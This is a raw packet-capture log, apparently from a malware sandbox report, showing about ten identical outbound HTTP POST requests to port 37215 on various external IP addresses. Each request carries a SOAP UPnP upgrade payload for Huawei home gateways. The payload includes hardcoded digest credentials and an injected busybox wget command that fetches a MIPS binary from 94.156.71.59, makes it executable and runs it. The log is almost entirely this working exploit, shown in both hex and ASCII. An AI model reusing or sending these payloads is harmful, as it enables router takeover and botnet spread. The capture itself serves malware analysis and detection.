                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            881192.168.2.133383641.161.161.10337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.906255960 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            882192.168.2.1351602156.230.96.13837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.907505989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            883192.168.2.1358970156.202.174.16737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.908641100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            884192.168.2.135442641.223.106.1537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.909928083 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            885192.168.2.1347504197.148.228.10337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.910933971 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            886192.168.2.133388041.213.29.19737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.911966085 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            887192.168.2.135968441.187.204.3037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.913436890 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            888192.168.2.1359818197.246.148.6037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.914937973 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            889192.168.2.1350156156.113.136.16937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.916548014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            890192.168.2.1347136197.51.204.22237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.917907953 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 